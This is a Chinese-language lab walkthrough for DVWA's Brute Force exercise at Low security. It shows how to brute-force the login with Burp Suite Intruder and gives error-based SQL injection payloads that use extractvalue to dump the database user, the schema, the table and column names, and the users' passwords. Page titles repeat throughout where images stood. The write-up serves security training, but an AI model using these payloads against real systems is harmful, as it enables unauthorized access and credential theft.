DVWA - Brute Force (Low)

low级别(使用burpsuite 和 sql报错注入 )

使用burpsuite

打开burp suite,配置好代理,截取数据包DVWA - Brute Force (Low)

在空白处右键选择send to Intruder ,或者直接ctrl+l 键

DVWA - Brute Force (Low)
进入Intruder,清除所有原来默认的变量
DVWA - Brute Force (Low)

只对username和password添加变量

DVWA - Brute Force (Low) 选择Attack type为Cluster Bomb
DVWA - Brute Force (Low)
Payload set 为1,表示为第一个参数设置字典为2就是为第二个参数设置字典
DVWA - Brute Force (Low)
DVWA - Brute Force (Low)
可以修改线程数提高速度,选择start attack,开始**
DVWA - Brute Force (Low)
DVWA - Brute Force (Low)
admin password 长度与其他不同 ,**成功
DVWA - Brute Force (Low)
登录成功

sql注入

1.获取用户
1’ and extractvalue(1,concat(’~’,(select+user()),’~’))# DVWA - Brute Force (Low)
DVWA - Brute Force (Low)

2.获取数据库名
1’ and extractvalue(1,concat(’~’,(select database()),’~’))#
DVWA - Brute Force (Low)
DVWA - Brute Force (Low)

3.获取表名
1’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 0,1),’~’))#

DVWA - Brute Force (Low)
1’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 1,1),’~’))#

DVWA - Brute Force (Low)
1’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 2,1),’~’))#
DVWA - Brute Force (Low)
报错证明只有两张表

4.获取列名
1’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1),’~’))#

DVWA - Brute Force (Low)
1’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 1,1),’~’))#

DVWA - Brute Force (Low)
修改limit值,查看全部列名 我们只用user,password这两列

5.获取字段值
1’ and extractvalue(1,concat(’~’,(select concat(user)from dvwa.users limit 0,1),’~’))#

DVWA - Brute Force (Low)
1’ and extractvalue(1,concat(’~’,(select concat(password)from dvwa.users limit 0,1),’~’))#
DVWA - Brute Force (Low)
DVWA - Brute Force (Low)